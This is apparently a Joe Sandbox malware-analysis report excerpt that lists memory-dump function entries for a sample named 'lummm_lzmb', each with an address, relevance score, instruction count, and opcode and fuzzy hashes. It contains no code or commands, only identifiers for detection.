Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e94d694ade5726b004128cbd0aaa644f62950b131cbc63d17a70add4b8b3435d
Instruction ID: 443b3568e2f80d5c2e9e65db7d570a1d0a8822847e1ec6f232a5283a35794e13
Opcode Fuzzy Hash: e94d694ade5726b004128cbd0aaa644f62950b131cbc63d17a70add4b8b3435d
Instruction Fuzzy Hash: CC218BF0D0520ECBCB40DFA9C505AEEBBFABB4A304F188069C414B3261DB759A00CB61

Function 0125D030 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713350479.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cd90704529d4136b5d357b8c161e8049582f45115646ff16f1bfa5b705ad9f4
Instruction ID: e0a2870072f916ac7d9a1649b511e8892a06c22c97799d43f6c742db145c2276
Opcode Fuzzy Hash: 0cd90704529d4136b5d357b8c161e8049582f45115646ff16f1bfa5b705ad9f4
Instruction Fuzzy Hash: 6D213471514208DFDB51EF58DAC4B2BBFA5FB84314F20C169ED094B246C376D846CBA2

Function 012B1BE8 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 285c46cab4dacabfa851e4ced021917c5d1c8e9e96cd99f4b8093cafbcb8a3d1
Instruction ID: 0822ba07c80090486e83f1bc24a53bdc1ef7db406fe15021a62706234ac18be0
Opcode Fuzzy Hash: 285c46cab4dacabfa851e4ced021917c5d1c8e9e96cd99f4b8093cafbcb8a3d1
Instruction Fuzzy Hash: 672180B0D29208DFCB45DFA8F49479DBBB1EB40300F51C196D003AB245D7749E4A9B4A

Function 0125D006 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713350479.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d3661155b363298cf8ce0956d95c27433d72fa0b68e0a94d7140fbe63008f85
Instruction ID: fba7bd81316622b7174a1978dfafe5551a90b36cff7955e800f36c55e6aa5148
Opcode Fuzzy Hash: 3d3661155b363298cf8ce0956d95c27433d72fa0b68e0a94d7140fbe63008f85
Instruction Fuzzy Hash: 04219F764093C48FCB03CF24D990715BF71AB46210F2981EBD9448F2A7C33A981ACB62

Function 012B4658 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54de81b47215ec19f4b36e4612e23de6d1beabdd9682e3cf2e85e0f3f8854710
Instruction ID: 952142dff3e39ce12511d69b035f06a4f8e7df799dfc256e890ab7626dae6ed3
Opcode Fuzzy Hash: 54de81b47215ec19f4b36e4612e23de6d1beabdd9682e3cf2e85e0f3f8854710
Instruction Fuzzy Hash: D8312974A14255CFC354EFA8E5DC599BBF2BB88301B148259D0068B39ADB30DC82CF92

Function 012B45E4 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c6027b16c09fc946f448c645d5e107e030327aa532f398e1ecac0103e6798ef
Instruction ID: 0a759a4c605887425064419e7118a3139f04bc759b168c3ed9c17f642e42cf79
Opcode Fuzzy Hash: 5c6027b16c09fc946f448c645d5e107e030327aa532f398e1ecac0103e6798ef
Instruction Fuzzy Hash: 73312974A14246CFC764EF68E5DC558BBF2BB48305B188295D5168B39AD730A882CF52

Function 012B450D Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c3fbcd671ef625a12f81df63a850fab3c6f632ec887118b18020d39ee3c2bc6
Instruction ID: 9610027a766d163c0d3a08147f61ad117795143279740c3e1874e95de832194a
Opcode Fuzzy Hash: 7c3fbcd671ef625a12f81df63a850fab3c6f632ec887118b18020d39ee3c2bc6
Instruction Fuzzy Hash: D521F774A14216CFC764EF68E5D8599FBB2BB48341B148365E41A8B38AD730DC41CF92

Function 012B4530 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66faca6cc8434fd2d463f1d6a3edf1fe6ce43aef4847126031db2186069ca50a
Instruction ID: 45767c0fd7a33d23fd3d33b281f6accb1d76368daa2fe5ccc107d6e60730043f
Opcode Fuzzy Hash: 66faca6cc8434fd2d463f1d6a3edf1fe6ce43aef4847126031db2186069ca50a
Instruction Fuzzy Hash: F4211774A10216CFC764EF68E5DC559BBB3BB88301B148365E4078B39ACB30DC81CB92

Function 012B456E Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fe983e5ee8db280d7164ad65c490f112ad0d7c42ac5863b5a4472ef5e0326f1
Instruction ID: 0af716c9d4f542d593480b36edcb78b9cf0db888abd5f67af335b82113a22c60
Opcode Fuzzy Hash: 1fe983e5ee8db280d7164ad65c490f112ad0d7c42ac5863b5a4472ef5e0326f1
Instruction Fuzzy Hash: 93211574A10216CFC764EF64E1DC559FBB3BB88341B198264E40A8B38ADB34DC81CF92

Function 012B4555 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a4048142e33d872c88ac6dcf3a5a4e5ed18ee0cb73e53c9f96fd1bbf754ba8
Instruction ID: 8de83d45c5ffb40d39478b2227cb871c8c06972a38f88dbf4a10d5fdd7d7efad
Opcode Fuzzy Hash: 33a4048142e33d872c88ac6dcf3a5a4e5ed18ee0cb73e53c9f96fd1bbf754ba8
Instruction Fuzzy Hash: 542139B4A14216CFC364EF68E5DC499BBF2BB483017148265E507CB39ADB349C41CF92

Function 012B45B4 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b2b4f4bf915cad7a61867f68911ea0a4d283619b52bde61afa0cfa3e2b58a4c
Instruction ID: c95e1aa20c1067c8682ecd3769c8039d8c430a81bf657442dd52ceb83c1ef4ab
Opcode Fuzzy Hash: 8b2b4f4bf915cad7a61867f68911ea0a4d283619b52bde61afa0cfa3e2b58a4c
Instruction Fuzzy Hash: 4021D474A14216CFC764EF68E5DC559BBE2BB883017158365D41A8B38ADB30EC82CB92

Function 012B4591 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62dcbe8bb77d1f7067cb060370a1d2ba5b4e87f7e913dc6ed2fea3b601166ea4
Instruction ID: be129a47c0cebd8b6cd8ea471d8151db861e320b8d450beeee5fca7a41c1b330
Opcode Fuzzy Hash: 62dcbe8bb77d1f7067cb060370a1d2ba5b4e87f7e913dc6ed2fea3b601166ea4
Instruction Fuzzy Hash: CF21D574A14216CFC764EF68E1DD559FBE3BB88341B198265D4068B35ACB34EC81CF92

Function 012B44F4 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 609620fa775ac59f6b9f055c7ea1d753824907a36fef7a4367901f00f126be64
Instruction ID: 13d856e18c6e82e58a26b754b73f70f28e6cb39e8a4b2b67d6f64883da3bb49f
Opcode Fuzzy Hash: 609620fa775ac59f6b9f055c7ea1d753824907a36fef7a4367901f00f126be64
Instruction Fuzzy Hash: 70212774A14216CFC354EF68E5DD599BBF2BB48341B048265E4078B38ADB349C41CF92

Function 012B44CF Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31294b1a26feaa5cfdb04240f5392abaf5cc1ff6e046f25cf3120392f5f32953
Instruction ID: 970f20bbe058751eb9d6b807fba3bc0188431d27fa47ce299dcaa257b44d9d22
Opcode Fuzzy Hash: 31294b1a26feaa5cfdb04240f5392abaf5cc1ff6e046f25cf3120392f5f32953
Instruction Fuzzy Hash: DF211774A10216CFC764EF68E1DC599FBF2BB88301B148265D51A8B38ADB30DC41CF92

Function 012B462F Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcd0f6247f2756d39ba20fad3404a90dcc653984669147740e8cbd78394207d4
Instruction ID: bd55007f17bffc2311d3f5b5f4af835ea8b8a319149b888515899740d55ab9bf
Opcode Fuzzy Hash: bcd0f6247f2756d39ba20fad3404a90dcc653984669147740e8cbd78394207d4
Instruction Fuzzy Hash: FC212774A14216CFC364EF68E5DC599BBF2BB88301B148365D4078B38ADB349C41CF92

Function 012B46CE Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f96223b2658613d25d7378cb35a1ccacf4dc8db91019d6406cce7393aade8d29
Instruction ID: e5c3dc8179c260a6284e7453ca99f4e8a6ff0d0dfa0da1c58213f65fa0a5feb7
Opcode Fuzzy Hash: f96223b2658613d25d7378cb35a1ccacf4dc8db91019d6406cce7393aade8d29
Instruction Fuzzy Hash: 85210774A14256CFC764EF68E5DC599BBE2BB4834170983A5D4078B34ADB30EC81CB92

Function 012B87D7 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b12bfd47878e969b03e8e2201a665577e76be036016867d86fd3cd39e8e769e2
Instruction ID: b849f0e3b611c0b670669ed1cc6e7d464b376bb20b7ef1c1020ecc048a0219d9
Opcode Fuzzy Hash: b12bfd47878e969b03e8e2201a665577e76be036016867d86fd3cd39e8e769e2
Instruction Fuzzy Hash: 81212B78A14115CFD798DF04D889AA8FBB6BB45305F04C2A5E40DA7315CB30DD85DF81

Function 012B3E50 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b6a81df45e8d16ad69f2302095f557c074a58a52725e1c354f82c24e30b0919
Instruction ID: 88b0495131bc5e39e022f2b5d28f4f4e2dc15fa030504fc1cf9e2fe110a852a9
Opcode Fuzzy Hash: 9b6a81df45e8d16ad69f2302095f557c074a58a52725e1c354f82c24e30b0919
Instruction Fuzzy Hash: 38012232B242528BEB31967CA5993EA6FA1EF84390F000077EE41D7244E7B0C98AC791

Function 012B1C18 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8bb188aae3f9043cb611610c5af80382008cb711d14bb91325505a6361dcd52
Instruction ID: cbba65b5e5d0a99a03189b4c25cb9d10da093d1d133915e9cfe816e20e24aff3
Opcode Fuzzy Hash: b8bb188aae3f9043cb611610c5af80382008cb711d14bb91325505a6361dcd52
Instruction Fuzzy Hash: F32159B0D25208EFDB44DFA4F5E57ACBBB1EB40304F50C59AC003AB240D7B45B5A9B0A

Function 012B1C28 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a49a8a1b23da491621760227084af00915098b6475e235f03f6c303d5bd50f1
Instruction ID: 4028db3569ab17c7475111682ab1bcb0137b5ea20d8ed8691fb40e32143b86e3
Opcode Fuzzy Hash: 1a49a8a1b23da491621760227084af00915098b6475e235f03f6c303d5bd50f1
Instruction Fuzzy Hash: B01146B0D2420CEFDB44DFA4F5D57ADBBB1EB40304F50C1A9C007AB240D7B45A5A9B4A

Function 0124D785 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713312750.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_124d000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50145b1bf17b69974e731db5b77bdae3543c982f29877a74ca5808c0bfd5496b
Instruction ID: 073d74b60bc1ae5c5a0ac7558c4c5136653f85d20e7dced03fb8a952d5a4f3f6
Opcode Fuzzy Hash: 50145b1bf17b69974e731db5b77bdae3543c982f29877a74ca5808c0bfd5496b
Instruction Fuzzy Hash: 9001A7310193899BE719CA69CD84B67BFA8EF51724F18C52AEE094A286C6799840C671

Function 075778FE Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0e0f978539033dc4e3d19ff8c402354975e5b795ed8f8cfa8add8455fea9976
Instruction ID: 88a2cdc1ef4c20282bf26020cc94c8ef6886f22a7c1e12667f3962f412560697
Opcode Fuzzy Hash: c0e0f978539033dc4e3d19ff8c402354975e5b795ed8f8cfa8add8455fea9976
Instruction Fuzzy Hash: 781149B0A051268FDBA5DF15DC94BEAB3B0FB09314F0041D6D41DA3685D7309D85CF51

Function 012B86C0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45312cdc05a24eba34b3b8c6cdfaf845be25fc0d29d90d2ef80a35c44642c46b
Instruction ID: 32d1c333835b9cf17ef9bd07efac0be206deb238978f629123b78d8836250a4b
Opcode Fuzzy Hash: 45312cdc05a24eba34b3b8c6cdfaf845be25fc0d29d90d2ef80a35c44642c46b
Instruction Fuzzy Hash: FD113A78A2422ACFDB68DF18D9887A9BBF6BB48348F048195D10DA7341D7708AC1DF41

Function 012B25C6 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6c4693179e39497191fb47d9b5f6c1ecdec0ac1f9f4acc23a4dd1d1da4f077f
Instruction ID: 68c1d573fe1bbb1755d1ccabcee18bb68fd8f4973aa0860c7f0b78be56fc2cbe
Opcode Fuzzy Hash: e6c4693179e39497191fb47d9b5f6c1ecdec0ac1f9f4acc23a4dd1d1da4f077f
Instruction Fuzzy Hash: 97017830A50306CFC715CFA8C998BAEBBB1AF48344F204469E902DB3A5DBB4AC01CB00

Function 012BAB59 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15ad32f624f24cf260e087d90779bed82a3ac07a730036c6fa4a69cc0ac733e3
Instruction ID: f287822fb0e9c072bbaa06ee41235a6df4a7ab4eaef1e4e582d09136b3d614e5
Opcode Fuzzy Hash: 15ad32f624f24cf260e087d90779bed82a3ac07a730036c6fa4a69cc0ac733e3
Instruction Fuzzy Hash: 4AF028758341199FC711E6B0E8D21F9BB31FB52344F010AA6D542972A1EB34551587A2

Function 012B27F8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 189921efbac665b9ea4f8af6ef3bac7a224e5ba17b061e7efbbade392730530c
Instruction ID: ae28f630efe87d7b3e08013e68d28dbf54b813f2368350d78e0135f69eecbd51
Opcode Fuzzy Hash: 189921efbac665b9ea4f8af6ef3bac7a224e5ba17b061e7efbbade392730530c
Instruction Fuzzy Hash: E6F03A357146159FD314CA5ED884F57B7EAFFC8B61B248069F209CB364DAB0EC0187A0

Function 0124D784 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713312750.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_124d000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5900b1b1560f4ca941f640587b403b23cbcb71c39ef45d7ba6a2e98023a7cc1
Instruction ID: 846a7a2021cddf78837efd2d73ce07c9013838b6dec34a5d12b67b36347de013
Opcode Fuzzy Hash: c5900b1b1560f4ca941f640587b403b23cbcb71c39ef45d7ba6a2e98023a7cc1
Instruction Fuzzy Hash: FBF062714053849AE7158E1AC8C8B62FFA8EB51724F18C55AEE084F286C2799844CBB1

Function 07578A47 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 813d0c20697b2c7e02c29b62e279a7134f79cc4dfccf9b134f176febb37b1b8d
Instruction ID: dc8dfc433a8ea9633d22f10e88d851c9ad7119603ec641b3e613dd3813eee9a3
Opcode Fuzzy Hash: 813d0c20697b2c7e02c29b62e279a7134f79cc4dfccf9b134f176febb37b1b8d
Instruction Fuzzy Hash: BA11B778A081698FCB68DF29DD94AEEB7F1FB48301F5041EA9909A3344DB709E85CF40

Function 02E40090 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0431e75dd3cb67ad5e53fcd70e7165aab0966bbea704194df18c84b60b99d194
Instruction ID: 74afcf3be65d809ea95ab33b4b7fcb13df004475bdc39d50de7077167acac142
Opcode Fuzzy Hash: 0431e75dd3cb67ad5e53fcd70e7165aab0966bbea704194df18c84b60b99d194
Instruction Fuzzy Hash: E1F0B82234D3D00FC70757B8582A5A83FB28F9B22030A51EBC580CF2A3D9588C0A8362

Function 012B1D18 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95cd0ae8f3557da97d479080cfc55002e8bc28cecd5715a740ffa83f028db5dc
Instruction ID: 7ad9cc42999802c2d3b76d937319886da8791bec65356abc4f8b8ac403408bbc
Opcode Fuzzy Hash: 95cd0ae8f3557da97d479080cfc55002e8bc28cecd5715a740ffa83f028db5dc
Instruction Fuzzy Hash: 04F0E2357142504BC754EB7CE09CA9ABBEAEFC9224F04846DE44AC7355CE76DC02C791

Function 02E4019C Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2a2932f1f95c29bc8f3b18f844d024c57c2df3e74abafade7fd403940e04ce3
Instruction ID: 6dcc57be0fef55f48e1b65714cba0fa7fdf9a4169c4d27cdbaee91a11ab8eaa0
Opcode Fuzzy Hash: b2a2932f1f95c29bc8f3b18f844d024c57c2df3e74abafade7fd403940e04ce3
Instruction Fuzzy Hash: 1BE0123519E6D04FD3538B74D9595913F609E0751830D10EBD0C4CFA73D6229815C762

Function 012BD569 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 204734d3cd05e43ed74f51f12cf6087e0bc1a464fba085589ed9bc490f005a97
Instruction ID: a9301b254c4fba707797aa5e19970e2b01dbb2bdb3f7d5a1323b1a02b8de9b5b
Opcode Fuzzy Hash: 204734d3cd05e43ed74f51f12cf6087e0bc1a464fba085589ed9bc490f005a97
Instruction Fuzzy Hash: 93F0E5363082114FC71AA679ECA51AEBF66EFC2219708997FD149C7366DE649C0D8390

Function 012BB43E Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fb43ec8803b97b966f1b21b65c04719061f7b43fbef46ffc3a3a8a9b95abb08
Instruction ID: 483f827f622b40a30a73c88dd1e84e0af9a234a17081736344b944a6d322d372
Opcode Fuzzy Hash: 5fb43ec8803b97b966f1b21b65c04719061f7b43fbef46ffc3a3a8a9b95abb08
Instruction Fuzzy Hash: B5F0BB75924259CFC761DBA4D8E20ECB731FB80350F104366C5134B2E1D7741942CF91

Function 075720D4 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83206ad9d9bfd6369f9fb12ec1697c7a9ddc265e754ad4e46202733947b1ec65
Instruction ID: 9be95037487f85f08da7cffe28ea75c22f3a5800272e00154085947629233dee
Opcode Fuzzy Hash: 83206ad9d9bfd6369f9fb12ec1697c7a9ddc265e754ad4e46202733947b1ec65
Instruction Fuzzy Hash: E801A574A00129CFCB29DF19CC94AEAB7F1FB49301F1585E9A909AB340C7309E85CF50

Function 02E4072C Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bc4404a79846e8e58a847511469edacc10774ad2d3fafd578b51a427a6288b7
Instruction ID: ee3730e34c2e62bd1ddd9bea1ac30fa8a9fe79513cb9855e038549edb49e002d
Opcode Fuzzy Hash: 3bc4404a79846e8e58a847511469edacc10774ad2d3fafd578b51a427a6288b7
Instruction Fuzzy Hash: B1E092B214C3C0AFD7028BA4DC66F457FA0EF12714F1B44E6F2804F6A3D6A19800CB51

Function 012BB161 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23922b849d3cd94f72d35e4a9c8e9e36d3f02f5b9a6453d010fcf4be6d6e6bcc
Instruction ID: 0c854af45dd188e6ecc1457b31574f5362ff23163c1182e89da48cda1c527fc5
Opcode Fuzzy Hash: 23922b849d3cd94f72d35e4a9c8e9e36d3f02f5b9a6453d010fcf4be6d6e6bcc
Instruction Fuzzy Hash: 83F02779535219DFCB24DFA0E8D12ECBB30FF84384F1041A6C0028B351D7745A82CBA1

Function 056E20D8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1727750626.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56e0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb1a636716faa111b3ed7e1be85510f056c252ad1c53fc7562941f0a249e87e2
Instruction ID: db06208483d39cac3b59ee76f47af8ef2dc7701479ab53e5825cd31ccd2d726e
Opcode Fuzzy Hash: bb1a636716faa111b3ed7e1be85510f056c252ad1c53fc7562941f0a249e87e2
Instruction Fuzzy Hash: 70F0E5BC2092815FC301D750E4A18B57B77EFE2314714C48BD56A1B2A6C6318D13DBA1

Function 02E403C0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

